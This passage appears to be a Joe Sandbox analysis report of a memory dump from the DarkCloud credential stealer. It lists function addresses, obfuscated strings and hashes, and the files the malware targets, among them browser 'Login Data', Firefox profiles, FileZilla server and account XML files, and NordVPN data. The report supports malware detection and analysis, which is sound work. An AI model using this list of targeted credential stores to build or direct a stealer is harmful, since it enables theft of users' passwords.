String ID: 018233D212BD96C76EFAC1$0D20F2206F5DAE7279D4EFBC0733$1036$1461A892CA2FFCADF76B7E$1D6B1F628880ACBCBB34824D81284442FEAE563D$2595F963F502C55A3C3F624DB81819$28F9FB47ED1729FD822170F4578A9285230BCAA974BAA273401D2A7DF582E4E4B4D9DB39C0778DBD7AADF80E8C24164F0524241BC4730B963F29F9B389C0836AFC$37EB084DBA6F89C25B91482CC855$3BE9534F92922D594D$4445D25E$501E7502C3DCB3FA$5ACDB26266EBCEE9908C13$687A7A95A4807A6264910F50F6AF9111AEECEDC6A8D7B90FD02A0466E7EBFF28392F99021042EDB9F3143BD2330849357A32B82795420272925B$72F3A608908F6AABC0333012A001E51F3F1B$873D32507214ABA286$8D8BE9D7E35E818249CB72E6CCC4D74A6868$976DD7EBFCB8712D14D64D0231B0388761013833$98BDF53CA74E63B17612D42AFECF3549054E$9B95764C503A3E0E42$<`C$<`C$<`C$<`C$<`C$<`C$<`C$<`C$<`C$<`C$===============DARKCLOUD===============$A0BC0EE17525AE1DDF$A1A4D37C$A3E829525DEFFFB6FCEF85FCCC5E63AAD686981C3EDEABA6$ABFCBF866FB082D135BC6904D5AAE2$B04E370D556D36BCD9165C$C1B11CBDAF38D7$C746595CE79B6874F3$CjqvDaEKNGuE$CnVfZjByIepOZLYDFiUkNSMpTygwBvQhC$D51A578490E48C3250E877F43C7835$D73DEF209F72712B305CB0320D5D$DFBE4B2904$DhWhmuEljsDcSmzIWEjSQHdoyhoKtnIGPOignBHXyf$E0D77086$F272CD83B3318E079A4C2DA80BBDDE6D9A0AB566A2807D180767CC75DCAAE0E06D4E09ECE56A97E2E85A6D29$F970851EC80559379B380DDD6665$GetDWORDValue$GetExpandedStringValue$GetMultiStringValue$Global$HzbpqrXwwHsxRuFxZIRVsKDwPyiZsuQdq$IMgOucRXkSeFtojrooiFcGGmthHBNDfs$IgnoreCase$JUErQCMaOfPFSEEcrTNJqBnTOuiTVJvd$KoezDrmoKPHeEzPfjPLmykT$LiWYNRJIhGOqBGHnqCdKmwKjQPQxmVumLvoxGkOQoq$NAQKqxgpUOzJI$NIrSDPxhaTsnqhcSUFyyssZRYJIiqXi$NNqiwPhgynonFBbOffaRmc$Pattern$PcNvyNCHtLcjSpxBlfuXEF$PfjUavFPlvaHLZmngjQxgGrFKpsBnLeOv$SCcafEMOFYqajEzKILINgEB$SYcMrgQUKUqhQbFvPTYVSpdJIXrxNHINwdgjKRubC$UXShQRFgtMrMnjUFtbaBfKOpRElRKQqv$VAExxQeVrDPj$VFEOrQPURXLkUeGYwbkdOxUvTabVUNKwWWyndUKDGoM$YbsYKEHFOLv$ZXIVvMhfelBGTlKPBgTgqCsFjsVlSUSV$bpVnwjsYupnPGUXBlWIsjKzI$cholericnessmMNjMwhZdmkLhargfireling$enumvalues$f$ffNuofBZhZGHJkPTUYxoHiaCuzsJIUQ$gdEjsFIrekJTULHWnmrdod$getbinaryvalue$getstringvalue$hVnxHDmdymUsdrqhNoEqLl$iGCWBTdJDilteVmLhNTLLJGksHitzqgRFdVxQndfQMFc$jkLLJCHEtKInqgNVUpYwcOPvXQRhCYIU$jwRDsbTkuovcHsUJYcgqilALKSmZHcZdQ$opzPiwTDDFNijDCalVqthpWvRfgpchkLa$orcHBOzujoLLElNjDswlxYTqotnGjwbJh$sfLDxjPNTkgQScvFFJgWDsNqTgBinxmY$sophianTeeeXhzEcuLxWPCsoHZZnbhmTxCvMMFzztwfissureless$sophisticismXaxWpqrhpdzwfirebirds$test$xooVwZFTbclWpdRqIMYQRDIErTutXivXFycFspwfWyE$yPJwfMFHTHIFYKLVJRFFZadCsFxdRorTsb
API String ID: 0-1636456612
Opcode ID: f03ea10f195fe097007372221b8f3bcffe518b73f3f338194cfc91d0631b2e9b
Instruction ID: 1a0e7890dd04bb662f6ef60234891ecb281fe07279e07ab7b7e1fa8f18be3639
Opcode Fuzzy Hash: f03ea10f195fe097007372221b8f3bcffe518b73f3f338194cfc91d0631b2e9b
Instruction Fuzzy Hash: 5AA3D7719002289FDB65DF54CD88BDEB7B5BB48304F1082EAE50AA72A0DB745BC5CF94

Function 0040C8D0 Relevance: 109.3, Strings: 83, Instructions: 5551COMMON

Download Yara Rule

Strings

LiWYNRJIhGOqBGHnqCdKmwKjQPQxmVumLvoxGkOQoq, xrefs: 0040F0CD
49C478D56E7963DE605867050B2535352BB97577EC4FCF982033D74E939C4563825E9E49CE770D3747CB67596C258E8ACACFC09C8A7F95AF9C48F3F16E8AE7DA37, xrefs: 00411CD4
@`C, xrefs: 0040FEE1
moBiOllIQYPQXUeVabiEDSEVZydGLdmFE, xrefs: 0040D026
NordVPN, xrefs: 0040EB26
59E453F14C4C54E972544323, xrefs: 0040CD04, 0041247B
@`C, xrefs: 0040E061
vcoRwbyfgHWjSOMqkPLCrnXiHdDxGPJF, xrefs: 0040CEE0
===============DARKCLOUD===============, xrefs: 0040F9C0
KoezDrmoKPHeEzPfjPLmykT, xrefs: 0040F78E, 0040F945
8`C, xrefs: 0041243D
nFsGseMmyZunH, xrefs: 0040DE16, 0040E121, 0041063C, 00410948, 00411512
D`C, xrefs: 0040FF57
8`C, xrefs: 004123C7
wDPbvfRXFTSmfEAqUopqYgOj, xrefs: 0040F3AA
67B724FFD607D608956DD3FAD9069B8A0BBE2E254179B7D790B85BED23F3BAC680FF2787DC795BCD95D620448FDA7906AB701A6C7F6F959F302986B16D7D923A8A, xrefs: 00411DCD
\User Data\Default\Login Data, xrefs: 0040DA0E, 0040DD5F, 00410231, 00410585
D`C, xrefs: 00410498
D`C, xrefs: 004111AF
VfnZTbrFSRUky, xrefs: 0040CBE0
@`C, xrefs: 0040D6BF
F4788B4C6095A7F1F455, xrefs: 0040CEBE
5BEBFE5174A12AB5FF113D5BAA47A1BFA28EBB859C8890611089DFF441AFEF29CFE89582489FE8FB03, xrefs: 004121B1
D`C, xrefs: 004108FF
A3EF35585B9DF8BCF4E899F7, xrefs: 0040EC95, 0040EE61
lwXIKkkunujZbOuEUGQOnPHw, xrefs: 004121DC
\User Data, xrefs: 0040D69F, 0040E042, 0040FEC1, 00410869
D`C, xrefs: 00410D08
0AE2B078DBE89485, xrefs: 0040CB1B
B44330C97C, xrefs: 0040D0A7
CBB643B0E1DD29, xrefs: 0040CF61
59EA8FA8, xrefs: 004124D1
8`C, xrefs: 0040F9FC
472BAAE9B88CC7BED0D3C8CDF83DD10218AF6E, xrefs: 0040D447, 0040D753, 0040FC69, 0040FF75
sxUHNdbHPZvmO, xrefs: 0040CA9A
YbsYKEHFOLv, xrefs: 0040F755
@`C, xrefs: 004115BD
@`C, xrefs: 00410C92
ElUKNurDJohjbMsSpxVwfFZ, xrefs: 0040CB3D
@`C, xrefs: 00411642
6E2EA686342D57640F51C2D26739C4D5050B45CB52C10F718B4D7A4DABBCE90D9C0944B6A8C61C7A25E31A098CA6FC78509F23EEEB1BBE96FF24FA0AC6C027A139, xrefs: 00411FBF
@`C, xrefs: 00410889
6E4AFBA1A9D88D8B3352018D896444BEF8BB575CD6DB1E60503C8E64BA73, xrefs: 004120B8
dYbwHnxBHOIdQfqrurPIBbZDHwHgCfNKqDpKMrgRNr, xrefs: 0040D472, 0040D77E, 0040FC94, 0040FFA0
D`C, xrefs: 0040E4DD
73341C6B9597A4A6B55BAC19C00A540BB5944A33F3680F1F03795DE21409A88342, xrefs: 0040F0A2
4D8D58F91857756FE563A8, xrefs: 0040CC61
@`C, xrefs: 0040E467
4D5AD14697CAECBEDED7FB3C89CD8BF887AED673D8, xrefs: 0040F91A
8`C, xrefs: 0040F894
76254C700C0596, xrefs: 0040CA78
D`C, xrefs: 00410D5D
XnDLfyizkePrKUajdqknUUOiPJiVXlGA, xrefs: 0040CC83
8`C, xrefs: 00412894
58EC8C82DE56A139DE1917DF7CABDD64353805A995E6684E47DC13A27CE8590F3E, xrefs: 0040F37F
\Default, xrefs: 0041162F
D`C, xrefs: 0040E0D8
25024147984E81B5507F19, xrefs: 0040DDEB, 0040E0F6, 00410611, 0041091D, 004114E7
5C4BD25989C6FFAE9782B5, xrefs: 0040F72A
D78D2B8A870DEA53212776, xrefs: 0040F6FF
8`C, xrefs: 004123FC
\Profiles, xrefs: 0040E447, 0040E6C7, 0040EA14, 00410C72, 00410EF5, 00411246
<`C, xrefs: 004128AB
DC-Creds, xrefs: 00412836
Profiles, xrefs: 0040E3B0, 00410BDA
774EDF99B98973A4CF8702CAC5, xrefs: 0040D004
r, xrefs: 0041289F
jwhDYowEBbgYmvGRWPuYkh, xrefs: 0040CF83
DD7D5D08B238C355203C014FE3EFE5B6FFA025B658291A923AB1A91F18E576E69608AD3B9B7CC114C55C45EF39B45283ADF9523C04780F3C4BCAF61288B6B89C86, xrefs: 00411EC6
D`C, xrefs: 0040DC73
sfLDxjPNTkgQScvFFJgWDsNqTgBinxmY, xrefs: 0040ECC0, 0040EE8C
jWxXWEabObZuXTFotGxHKNiBrhgAhMG, xrefs: 004120E3
487EBEDA43A2BF7C, xrefs: 0040CBBE
fwiEwSbXOMarTSHLiYviIl, xrefs: 0040D0C9
D`C, xrefs: 0040E92A
sJXIxVSsiwEsQNeTDcaXZZI, xrefs: 00411EF1
D`C, xrefs: 0041115A
qnsSGwVlMQYKBeAoEPYpvJnZZoJkoYpwpVIgrFqhuu, xrefs: 00411FEA
mcvmrafHaLbcFPDqsXYPfsXuUxEYbQxP, xrefs: 0040CD48, 00411CFF, 0041251E
618B07D9EF27E928, xrefs: 0040CD26, 004124A6
D`C, xrefs: 0040D735
UrylAsbZoeZepqHoEeRyNBUuWsyETvXB, xrefs: 0040CDAE, 00411DF8, 004125A2
EsufHxBQJkSlvoZWltvMLxO, xrefs: 00412612

Memory Dump Source

Source File: 00000007.00000002.3304177579.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_401000_InstallUtil.jbxd

Yara matches

Similarity

API ID:
String ID: 0AE2B078DBE89485$25024147984E81B5507F19$472BAAE9B88CC7BED0D3C8CDF83DD10218AF6E$487EBEDA43A2BF7C$49C478D56E7963DE605867050B2535352BB97577EC4FCF982033D74E939C4563825E9E49CE770D3747CB67596C258E8ACACFC09C8A7F95AF9C48F3F16E8AE7DA37$4D5AD14697CAECBEDED7FB3C89CD8BF887AED673D8$4D8D58F91857756FE563A8$58EC8C82DE56A139DE1917DF7CABDD64353805A995E6684E47DC13A27CE8590F3E$59E453F14C4C54E972544323$59EA8FA8$5BEBFE5174A12AB5FF113D5BAA47A1BFA28EBB859C8890611089DFF441AFEF29CFE89582489FE8FB03$5C4BD25989C6FFAE9782B5$618B07D9EF27E928$67B724FFD607D608956DD3FAD9069B8A0BBE2E254179B7D790B85BED23F3BAC680FF2787DC795BCD95D620448FDA7906AB701A6C7F6F959F302986B16D7D923A8A$6E2EA686342D57640F51C2D26739C4D5050B45CB52C10F718B4D7A4DABBCE90D9C0944B6A8C61C7A25E31A098CA6FC78509F23EEEB1BBE96FF24FA0AC6C027A139$6E4AFBA1A9D88D8B3352018D896444BEF8BB575CD6DB1E60503C8E64BA73$73341C6B9597A4A6B55BAC19C00A540BB5944A33F3680F1F03795DE21409A88342$76254C700C0596$774EDF99B98973A4CF8702CAC5$8`C$8`C$8`C$8`C$8`C$8`C$<`C$===============DARKCLOUD===============$@`C$@`C$@`C$@`C$@`C$@`C$@`C$@`C$A3EF35585B9DF8BCF4E899F7$B44330C97C$CBB643B0E1DD29$D78D2B8A870DEA53212776$DC-Creds$DD7D5D08B238C355203C014FE3EFE5B6FFA025B658291A923AB1A91F18E576E69608AD3B9B7CC114C55C45EF39B45283ADF9523C04780F3C4BCAF61288B6B89C86$D`C$D`C$D`C$D`C$D`C$D`C$D`C$D`C$D`C$D`C$D`C$D`C$ElUKNurDJohjbMsSpxVwfFZ$EsufHxBQJkSlvoZWltvMLxO$F4788B4C6095A7F1F455$KoezDrmoKPHeEzPfjPLmykT$LiWYNRJIhGOqBGHnqCdKmwKjQPQxmVumLvoxGkOQoq$NordVPN$Profiles$UrylAsbZoeZepqHoEeRyNBUuWsyETvXB$VfnZTbrFSRUky$XnDLfyizkePrKUajdqknUUOiPJiVXlGA$YbsYKEHFOLv$\Default$\Profiles$\User Data$\User Data\Default\Login Data$dYbwHnxBHOIdQfqrurPIBbZDHwHgCfNKqDpKMrgRNr$fwiEwSbXOMarTSHLiYviIl$jWxXWEabObZuXTFotGxHKNiBrhgAhMG$jwhDYowEBbgYmvGRWPuYkh$lwXIKkkunujZbOuEUGQOnPHw$mcvmrafHaLbcFPDqsXYPfsXuUxEYbQxP$moBiOllIQYPQXUeVabiEDSEVZydGLdmFE$nFsGseMmyZunH$qnsSGwVlMQYKBeAoEPYpvJnZZoJkoYpwpVIgrFqhuu$r$sJXIxVSsiwEsQNeTDcaXZZI$sfLDxjPNTkgQScvFFJgWDsNqTgBinxmY$sxUHNdbHPZvmO$vcoRwbyfgHWjSOMqkPLCrnXiHdDxGPJF$wDPbvfRXFTSmfEAqUopqYgOj
API String ID: 0-2543828664
Opcode ID: 47b49da081995cdfd67eb17d14f00568cbb3f88cbc9adfbb6c4d973fd2d5d77e
Instruction ID: 1f4d888caf8d4b106bbab47fe4c5ee57e84b3046c7cfd658c2275d262959c59a
Opcode Fuzzy Hash: 47b49da081995cdfd67eb17d14f00568cbb3f88cbc9adfbb6c4d973fd2d5d77e
Instruction Fuzzy Hash: B3D3F771900219DFDB24DF64DD88BDAB7B5FB48300F1081EAE54AB72A0DB745A89CF58

Function 0040D2AE Relevance: 44.6, Strings: 34, Instructions: 2110COMMON

Download Yara Rule

Strings

LiWYNRJIhGOqBGHnqCdKmwKjQPQxmVumLvoxGkOQoq, xrefs: 0040F0CD
dYbwHnxBHOIdQfqrurPIBbZDHwHgCfNKqDpKMrgRNr, xrefs: 0040D472, 0040D77E
NordVPN, xrefs: 0040EB26
D`C, xrefs: 0040E4DD
73341C6B9597A4A6B55BAC19C00A540BB5944A33F3680F1F03795DE21409A88342, xrefs: 0040F0A2
@`C, xrefs: 0040E061
===============DARKCLOUD===============, xrefs: 0040F9C0
KoezDrmoKPHeEzPfjPLmykT, xrefs: 0040F78E, 0040F945
@`C, xrefs: 0040E467
1, xrefs: 0040FA74
8`C, xrefs: 0040F894
4D5AD14697CAECBEDED7FB3C89CD8BF887AED673D8, xrefs: 0040F91A
nFsGseMmyZunH, xrefs: 0040DE16, 0040E121
58EC8C82DE56A139DE1917DF7CABDD64353805A995E6684E47DC13A27CE8590F3E, xrefs: 0040F37F
wDPbvfRXFTSmfEAqUopqYgOj, xrefs: 0040F3AA
\User Data\Default\Login Data, xrefs: 0040DA0E, 0040DD5F
D`C, xrefs: 0040E532
D`C, xrefs: 0040E0D8
25024147984E81B5507F19, xrefs: 0040DDEB, 0040E0F6
@`C, xrefs: 0040D6BF
5C4BD25989C6FFAE9782B5, xrefs: 0040F72A
D78D2B8A870DEA53212776, xrefs: 0040F6FF
\Profiles, xrefs: 0040E447, 0040E6C7, 0040EA14
A3EF35585B9DF8BCF4E899F7, xrefs: 0040EC95, 0040EE61
\User Data, xrefs: 0040D69F, 0040E042
Profiles, xrefs: 0040E3B0
8`C, xrefs: 0040F9FC
472BAAE9B88CC7BED0D3C8CDF83DD10218AF6E, xrefs: 0040D447, 0040D753
D`C, xrefs: 0040DC73
sfLDxjPNTkgQScvFFJgWDsNqTgBinxmY, xrefs: 0040ECC0, 0040EE8C
YbsYKEHFOLv, xrefs: 0040F755
D`C, xrefs: 0040E92A
D`C, xrefs: 0040D735
D`C, xrefs: 0040E97F

Memory Dump Source

Source File: 00000007.00000002.3304177579.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_401000_InstallUtil.jbxd

Yara matches

Similarity

API ID:
String ID: 1$25024147984E81B5507F19$472BAAE9B88CC7BED0D3C8CDF83DD10218AF6E$4D5AD14697CAECBEDED7FB3C89CD8BF887AED673D8$58EC8C82DE56A139DE1917DF7CABDD64353805A995E6684E47DC13A27CE8590F3E$5C4BD25989C6FFAE9782B5$73341C6B9597A4A6B55BAC19C00A540BB5944A33F3680F1F03795DE21409A88342$8`C$8`C$===============DARKCLOUD===============$@`C$@`C$@`C$A3EF35585B9DF8BCF4E899F7$D78D2B8A870DEA53212776$D`C$D`C$D`C$D`C$D`C$D`C$D`C$KoezDrmoKPHeEzPfjPLmykT$LiWYNRJIhGOqBGHnqCdKmwKjQPQxmVumLvoxGkOQoq$NordVPN$Profiles$YbsYKEHFOLv$\Profiles$\User Data$\User Data\Default\Login Data$dYbwHnxBHOIdQfqrurPIBbZDHwHgCfNKqDpKMrgRNr$nFsGseMmyZunH$sfLDxjPNTkgQScvFFJgWDsNqTgBinxmY$wDPbvfRXFTSmfEAqUopqYgOj
API String ID: 0-4237399113
Opcode ID: d358c850387587c021aa8ad39203232a444323ac4147fa3e3c27d57159897694
Instruction ID: 4d357f92d2e305b4d2dd7745f8123c959a0029df7ac57893ae108c1b3717e7ff
Opcode Fuzzy Hash: d358c850387587c021aa8ad39203232a444323ac4147fa3e3c27d57159897694
Instruction Fuzzy Hash: 76330970A00219DFDB24DF64DD84BDAB7B5FB49300F1081EAE54AB72A0DB745A89CF58

Function 0040D412 Relevance: 44.6, Strings: 34, Instructions: 2050COMMON

Download Yara Rule

Strings

LiWYNRJIhGOqBGHnqCdKmwKjQPQxmVumLvoxGkOQoq, xrefs: 0040F0CD
dYbwHnxBHOIdQfqrurPIBbZDHwHgCfNKqDpKMrgRNr, xrefs: 0040D472, 0040D77E
NordVPN, xrefs: 0040EB26
D`C, xrefs: 0040E4DD
73341C6B9597A4A6B55BAC19C00A540BB5944A33F3680F1F03795DE21409A88342, xrefs: 0040F0A2
@`C, xrefs: 0040E061
===============DARKCLOUD===============, xrefs: 0040F9C0
KoezDrmoKPHeEzPfjPLmykT, xrefs: 0040F78E, 0040F945
@`C, xrefs: 0040E467
1, xrefs: 0040FA74
8`C, xrefs: 0040F894
4D5AD14697CAECBEDED7FB3C89CD8BF887AED673D8, xrefs: 0040F91A
nFsGseMmyZunH, xrefs: 0040DE16, 0040E121
58EC8C82DE56A139DE1917DF7CABDD64353805A995E6684E47DC13A27CE8590F3E, xrefs: 0040F37F
wDPbvfRXFTSmfEAqUopqYgOj, xrefs: 0040F3AA
\User Data\Default\Login Data, xrefs: 0040DA0E, 0040DD5F
D`C, xrefs: 0040E532
D`C, xrefs: 0040E0D8
25024147984E81B5507F19, xrefs: 0040DDEB, 0040E0F6
@`C, xrefs: 0040D6BF
5C4BD25989C6FFAE9782B5, xrefs: 0040F72A
D78D2B8A870DEA53212776, xrefs: 0040F6FF
\Profiles, xrefs: 0040E447, 0040E6C7, 0040EA14
A3EF35585B9DF8BCF4E899F7, xrefs: 0040EC95, 0040EE61
\User Data, xrefs: 0040D69F, 0040E042
Profiles, xrefs: 0040E3B0
8`C, xrefs: 0040F9FC
472BAAE9B88CC7BED0D3C8CDF83DD10218AF6E, xrefs: 0040D447, 0040D753
D`C, xrefs: 0040DC73
sfLDxjPNTkgQScvFFJgWDsNqTgBinxmY, xrefs: 0040ECC0, 0040EE8C
YbsYKEHFOLv, xrefs: 0040F755
D`C, xrefs: 0040E92A
D`C, xrefs: 0040D735
D`C, xrefs: 0040E97F

Memory Dump Source

Source File: 00000007.00000002.3304177579.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_401000_InstallUtil.jbxd

Yara matches

Similarity

API ID:
String ID: 1$25024147984E81B5507F19$472BAAE9B88CC7BED0D3C8CDF83DD10218AF6E$4D5AD14697CAECBEDED7FB3C89CD8BF887AED673D8$58EC8C82DE56A139DE1917DF7CABDD64353805A995E6684E47DC13A27CE8590F3E$5C4BD25989C6FFAE9782B5$73341C6B9597A4A6B55BAC19C00A540BB5944A33F3680F1F03795DE21409A88342$8`C$8`C$===============DARKCLOUD===============$@`C$@`C$@`C$A3EF35585B9DF8BCF4E899F7$D78D2B8A870DEA53212776$D`C$D`C$D`C$D`C$D`C$D`C$D`C$KoezDrmoKPHeEzPfjPLmykT$LiWYNRJIhGOqBGHnqCdKmwKjQPQxmVumLvoxGkOQoq$NordVPN$Profiles$YbsYKEHFOLv$\Profiles$\User Data$\User Data\Default\Login Data$dYbwHnxBHOIdQfqrurPIBbZDHwHgCfNKqDpKMrgRNr$nFsGseMmyZunH$sfLDxjPNTkgQScvFFJgWDsNqTgBinxmY$wDPbvfRXFTSmfEAqUopqYgOj
API String ID: 0-4237399113
Opcode ID: 3347fe5f7ce3e124f2127f561124191914f637a3b676330a04de03c27826aeca
Instruction ID: 24f7075496dcf182e989b8f8e27e2bc91d0c43e14d704ecaf58b28aed83b1e41
Opcode Fuzzy Hash: 3347fe5f7ce3e124f2127f561124191914f637a3b676330a04de03c27826aeca
Instruction Fuzzy Hash: 6F230971900229DFDB24DF60DD84BDAB7B5FB49300F1081EAE54AB72A0DB745A89CF58

Function 00412B10 Relevance: 43.7, Strings: 33, Instructions: 2467COMMON

Download Yara Rule

Strings

293C41549E43CE9D113158, xrefs: 00412F99
8`C, xrefs: 004143A8
===============DARKCLOUD===============, xrefs: 004135D2, 00414384, 00415031
KoezDrmoKPHeEzPfjPLmykT, xrefs: 004133D6, 00413A33, 00414238, 00414757, 00414F3A
A1A4D37C, xrefs: 00413DBB, 00414AE0
nFsGseMmyZunH, xrefs: 00412FDD
8`C, xrefs: 00413608
8`C, xrefs: 00415055
8`C, xrefs: 00413D14
\sitemanager.xml, xrefs: 00414459, 0041458F
8`C, xrefs: 0041330A
UXShQRFgtMrMnjUFtbaBfKOpRElRKQqv, xrefs: 00413A9A, 004147BE
5C4BD25989C6FFAE9782B5, xrefs: 00413392, 004141F4, 00414F18
D78D2B8A870DEA53212776, xrefs: 00412FBB, 00413D99, 00414ABE
%, xrefs: 0041507E
Application : FileZilla, xrefs: 00414FB4
Server, xrefs: 00413963, 00414687
Url : ftp://, xrefs: 00413C96, 004149BB
ZNeRrSIWVJKuUQttkyOikLJYCGDUpXV, xrefs: 00413516
B5A7C66222988DA08583664FF6AE6539A4DFAF9640B4FE, xrefs: 00414216
8`C, xrefs: 00414A39
YbsYKEHFOLv, xrefs: 0041311D, 00413E22, 00413FFB, 00414B47, 00414D1F
\accounts.xml, xrefs: 00412C53, 00412D89
\recentservers.xml, xrefs: 00413736, 0041386B
E0D77086, xrefs: 00413A78, 0041479C
4445D25E, xrefs: 00413A11, 00414735
8`C, xrefs: 00413F78
8`C, xrefs: 00414328
D29F3D8B, xrefs: 00413FD9, 00414CFD
EDB92B3FADBD19ABF0CA21CDE4FD119049D4C251, xrefs: 004133B4
8`C, xrefs: 00414FEA
8`C, xrefs: 00414C9C
NIrSDPxhaTsnqhcSUFyyssZRYJIiqXi, xrefs: 00413DDD, 00414265, 00414B02

Memory Dump Source

Source File: 00000007.00000002.3304177579.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_401000_InstallUtil.jbxd

Yara matches

Similarity

API ID:
String ID: %$293C41549E43CE9D113158$4445D25E$5C4BD25989C6FFAE9782B5$8`C$8`C$8`C$8`C$8`C$8`C$8`C$8`C$8`C$8`C$===============DARKCLOUD===============$A1A4D37C$Application : FileZilla$B5A7C66222988DA08583664FF6AE6539A4DFAF9640B4FE$D29F3D8B$D78D2B8A870DEA53212776$E0D77086$EDB92B3FADBD19ABF0CA21CDE4FD119049D4C251$KoezDrmoKPHeEzPfjPLmykT$NIrSDPxhaTsnqhcSUFyyssZRYJIiqXi$Server$UXShQRFgtMrMnjUFtbaBfKOpRElRKQqv$Url : ftp://$YbsYKEHFOLv$ZNeRrSIWVJKuUQttkyOikLJYCGDUpXV$\accounts.xml$\recentservers.xml$\sitemanager.xml$nFsGseMmyZunH
API String ID: 0-3957252282
Opcode ID: 653eef7ea2d41b0548e2227b82a40bfbda512d59724b846ab0c455eee503941d
Instruction ID: 4dd5cd4ce58f6c86372681dda2f19609dcbc516bb44fd8b84181beb7de82d77b
Opcode Fuzzy Hash: 653eef7ea2d41b0548e2227b82a40bfbda512d59724b846ab0c455eee503941d
Instruction Fuzzy Hash: 4743D575900218DFDB14DFA0DD88BDEB7B5FB48301F1082AAE50AB72A4DB745A89CF54

Function 00403CAB Relevance: 26.8, Strings: 21, Instructions: 565COMMON

Download Yara Rule

Strings

moBiOllIQYPQXUeVabiEDSEVZydGLdmFE, xrefs: 0040D026
59E453F14C4C54E972544323, xrefs: 0040CD04
vcoRwbyfgHWjSOMqkPLCrnXiHdDxGPJF, xrefs: 0040CEE0
774EDF99B98973A4CF8702CAC5, xrefs: 0040D004
B44330C97C, xrefs: 0040D0A7
0AE2B078DBE89485, xrefs: 0040CB1B
4D8D58F91857756FE563A8, xrefs: 0040CC61
CBB643B0E1DD29, xrefs: 0040CF61
XnDLfyizkePrKUajdqknUUOiPJiVXlGA, xrefs: 0040CC83
jwhDYowEBbgYmvGRWPuYkh, xrefs: 0040CF83
76254C700C0596, xrefs: 0040CA78
fwiEwSbXOMarTSHLiYviIl, xrefs: 0040D0C9
sxUHNdbHPZvmO, xrefs: 0040CA9A
487EBEDA43A2BF7C, xrefs: 0040CBBE
mcvmrafHaLbcFPDqsXYPfsXuUxEYbQxP, xrefs: 0040CD48
618B07D9EF27E928, xrefs: 0040CD26
ElUKNurDJohjbMsSpxVwfFZ, xrefs: 0040CB3D
G, xrefs: 00403CE9
VfnZTbrFSRUky, xrefs: 0040CBE0
UrylAsbZoeZepqHoEeRyNBUuWsyETvXB, xrefs: 0040CDAE
F4788B4C6095A7F1F455, xrefs: 0040CEBE

Memory Dump Source

Source File: 00000007.00000002.3304177579.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_401000_InstallUtil.jbxd

Yara matches

Similarity

API ID:
String ID: 0AE2B078DBE89485$487EBEDA43A2BF7C$4D8D58F91857756FE563A8$59E453F14C4C54E972544323$618B07D9EF27E928$76254C700C0596$774EDF99B98973A4CF8702CAC5$B44330C97C$CBB643B0E1DD29$ElUKNurDJohjbMsSpxVwfFZ$F4788B4C6095A7F1F455$G$UrylAsbZoeZepqHoEeRyNBUuWsyETvXB$VfnZTbrFSRUky$XnDLfyizkePrKUajdqknUUOiPJiVXlGA$fwiEwSbXOMarTSHLiYviIl$jwhDYowEBbgYmvGRWPuYkh$mcvmrafHaLbcFPDqsXYPfsXuUxEYbQxP$moBiOllIQYPQXUeVabiEDSEVZydGLdmFE$sxUHNdbHPZvmO$vcoRwbyfgHWjSOMqkPLCrnXiHdDxGPJF
API String ID: 0-3555934848
Opcode ID: 8250036d60fd0e44f6044df7814da200b3db6dcf04b3e13abdc396bb1fd1935b
Instruction ID: 0c22e3c2aa985780710ed44beeb8782c43392894046c8d6cd08205862a081505
Opcode Fuzzy Hash: 8250036d60fd0e44f6044df7814da200b3db6dcf04b3e13abdc396bb1fd1935b
Instruction Fuzzy Hash: 7242DC72910109EBCB05DFE0DE95EDEB7B9FF48304F10866AE102B6164EB746A49CF64

Function 0040FAD1 Relevance: 25.0, Strings: 19, Instructions: 1228COMMON

Download Yara Rule

Strings

@`C, xrefs: 0040FEE1
\Profiles, xrefs: 00410C72, 00410EF5, 00411246
D`C, xrefs: 004108FF
dYbwHnxBHOIdQfqrurPIBbZDHwHgCfNKqDpKMrgRNr, xrefs: 0040FC94, 0040FFA0
\User Data, xrefs: 0040FEC1, 00410869
Profiles, xrefs: 00410BDA
D`C, xrefs: 00410D08
D`C, xrefs: 00410D5D
nFsGseMmyZunH, xrefs: 0041063C, 00410948
472BAAE9B88CC7BED0D3C8CDF83DD10218AF6E, xrefs: 0040FC69, 0040FF75
D`C, xrefs: 0040FF57
D`C, xrefs: 0041115A
@`C, xrefs: 00410C92
S, xrefs: 004112CB
\User Data\Default\Login Data, xrefs: 00410231, 00410585
D`C, xrefs: 00410498
D`C, xrefs: 004111AF
25024147984E81B5507F19, xrefs: 00410611, 0041091D
@`C, xrefs: 00410889

Memory Dump Source

Source File: 00000007.00000002.3304177579.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Offset: 00401000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_401000_InstallUtil.jbxd

Yara matches

Similarity

API ID:
String ID: 25024147984E81B5507F19$472BAAE9B88CC7BED0D3C8CDF83DD10218AF6E$@`C$@`C$@`C$D`C$D`C$D`C$D`C$D`C$D`C$D`C$Profiles$S$\Profiles$\User Data$\User Data\Default\Login Data$dYbwHnxBHOIdQfqrurPIBbZDHwHgCfNKqDpKMrgRNr$nFsGseMmyZunH
API String ID: 0-3923499575
Opcode ID: 37d53d4f7e6b465666002dc09ae36e62ee2d8991dab705231d1dbc5893e3b528
Instruction ID: f7cc51bf4d476160e3cdda6e7f95fc567e5a620d13329429c7f2495e32262533
Opcode Fuzzy Hash: 37d53d4f7e6b465666002dc09ae36e62ee2d8991dab705231d1dbc5893e3b528
Instruction Fuzzy Hash: 9DD2F770A01219DFDB28CF54DD84BDAB7B1FB49304F1081EAE50AA72A0DB749AC5CF59

Function 0040FC35 Relevance: 24.9, Strings: 19, Instructions: 1168COMMON

Download Yara Rule

Strings

@`C, xrefs: 0040FEE1
\Profiles, xrefs: 00410C72, 00410EF5, 00411246
D`C, xrefs: 004108FF
dYbwHnxBHOIdQfqrurPIBbZDHwHgCfNKqDpKMrgRNr, xrefs: 0040FC94, 0040FFA0
